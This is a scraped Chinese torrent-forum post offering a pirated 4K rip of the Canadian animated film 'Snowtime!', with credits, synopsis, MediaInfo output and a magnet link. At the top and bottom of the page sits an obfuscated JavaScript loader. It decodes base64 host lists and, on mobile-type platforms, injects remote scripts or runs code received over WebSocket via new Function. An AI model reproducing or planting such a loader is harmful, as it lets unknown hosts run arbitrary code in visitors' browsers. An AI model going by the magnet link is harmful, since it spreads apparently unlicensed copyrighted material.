冰雪大作战[国语配音/中文字幕].Snowtime.2015.2160p.WEB-DL.H265.DDP2.0.2Audio 2.00GB

版主小s 1月前 237

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 冰雪大作战 / 玩雪时间到 / La guerre des tuques 3D

◎片 名 Snowtime!

◎年 代 2015

◎产 地 加拿大

◎类 别 喜剧 / 动画 / 家庭

◎语 言 英语 / 法语

◎上映日期 2017-04-01(中国大陆) / 2015-11-13(加拿大)

◎IMDb链接 https://www.imdb.com/title/tt5143700/

◎豆瓣评分 6.0/10 (2596人评价)

◎豆瓣链接 https://movie.douban.com/subject/26681656/

◎片 长 80分钟

◎导 演 让-弗朗索瓦·波略特 Jean-Fran?ois Pouliot (id:1294799)

弗兰克·布里森 Fran?ois Brisson (id:1367821)

◎编 剧 诺曼·卡纳克-马库斯 Normand Canac-Marquis (id:1367822)

罗杰·坎廷 Roger Cantin (id:1015098)

◎演 员 安吉拉·嘉鲁皮 Angela Galuppo (id:1367823)

玛丽欧·沃尔夫 Mariloup Wolfe (id:1014499)

露辛达·戴维斯 Lucinda Davis (id:1367824)

尼可拉斯·萨维德·鲁比尔 Nicholas Savard-L'Herbier (id:1367825)

苏菲·卡迪欧 Sophie Cadieux (id:1181651)

安妮·卡萨邦尼 Anne Casabonne (id:1367826)

艾琳·波斯瓦拉·乐卡克 Hélène Bourgeois Leclerc (id:1367827)

罗斯·林奇 Ross Lynch (id:1323997)

凯瑟琳·特鲁多 Catherine Trudeau (id:1152037)

吉尔多·罗伊 Gildor Roy (id:1140920)

安德鲁·萨维 André Sauvé (id:1367828)

塞巴斯蒂安·瑞丁 Sebastién Reding (id:1367829)

海蒂·林恩·维克斯 Heidi Lynne Weeks (id:1367830)

雨果林·什维特·兰黛斯科 Hugolin Chevrette-Landesque (id:1367831)

利兹·马克林 Liz MacRae (id:1367832)

任亚明 Yaming Ren (id:1363221)

◎标 签 动画 / 加拿大 / 冰雪 / 友情 / 温情 / 卡通 / 亲子 / 宠物

◎简 介

本片故事取材于1984年加拿大家喻户晓的经典电影《La Guerre des Tuques(阻止战争的狗)》,本片在30年前上映时曾轰动一时,在全球超过125个国家上映,获得18种全球奖项。《冰雪大作战》还是首部引入中国的加拿大动画片,同时也是2015年加拿大本土制作的 电影票房冠军。

电影讲述一群生活在加拿大小镇的孩子,在寒假来临时,为了打发无聊的时间,小男孩卢克和刚到搬到镇子上的小女孩索菲亚成为对立两派的首领,约定了一场超大规模的雪仗。雪仗的规模在两方孩子们的挑衅、误会等碰撞中不断升级,进而演变成雪堡保卫战,最后导致了意想不到的事故发生。这个事故最终停止了孩子们的战争,并让孩子们认识到了自己的错误,找到了游戏的真谛,即友情和快乐才是游戏的目的,于是,所有的孩子都在这个过程中醒悟并得到了成长。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 236277821987414371079044569159476834463 (0xB1C174089614A6790578868A7649F09F)

  4. Complete name : 冰雪大作战[email protected]mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 2.00 GiB

  8. Duration : 1 h 22 min

  9. Overall bit rate : 3 484 kb/s

  10. Encoded date : UTC 2021-11-03 07:35:14

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 22 min

  20. Bit rate : 3 197 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 600 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 25.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.021

  30. Stream size : 1.84 GiB (92%)

  31. Default : Yes

  32. Forced : No


  33. Audio #1

  34. ID : 2

  35. Format : E-AC-3

  36. Format/Info : Enhanced AC-3

  37. Commercial name : Dolby Digital Plus

  38. Codec ID : A_EAC3

  39. Duration : 1 h 22 min

  40. Bit rate mode : Constant

  41. Bit rate : 96.0 kb/s

  42. Channel(s) : 2 channels

  43. Channel layout : L R

  44. Sampling rate : 48.0 kHz

  45. Frame rate : 31.250 FPS (1536 SPF)

  46. Compression mode : Lossy

  47. Stream size : 56.5 MiB (3%)

  48. Title : English

  49. Language : English

  50. Service kind : Complete Main

  51. Default : Yes

  52. Forced : No


  53. Audio #2

  54. ID : 3

  55. Format : AAC LC

  56. Format/Info : Advanced Audio Codec Low Complexity

  57. Codec ID : A_AAC-2

  58. Duration : 1 h 22 min

  59. Bit rate : 192 kb/s

  60. Channel(s) : 2 channels

  61. Channel layout : L R

  62. Sampling rate : 44.1 kHz

  63. Frame rate : 43.066 FPS (1024 SPF)

  64. Compression mode : Lossy

  65. Stream size : 112 MiB (5%)

  66. Title : Chinese

  67. Language : Chinese

  68. Default : No

  69. Forced : No




复制代码


TAGS 动画 喜剧 家庭

磁力链:
  • magnet:?xt=urn:btih:33A4B756DCBEF6584F9C553E41B2CD65D82156DC

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};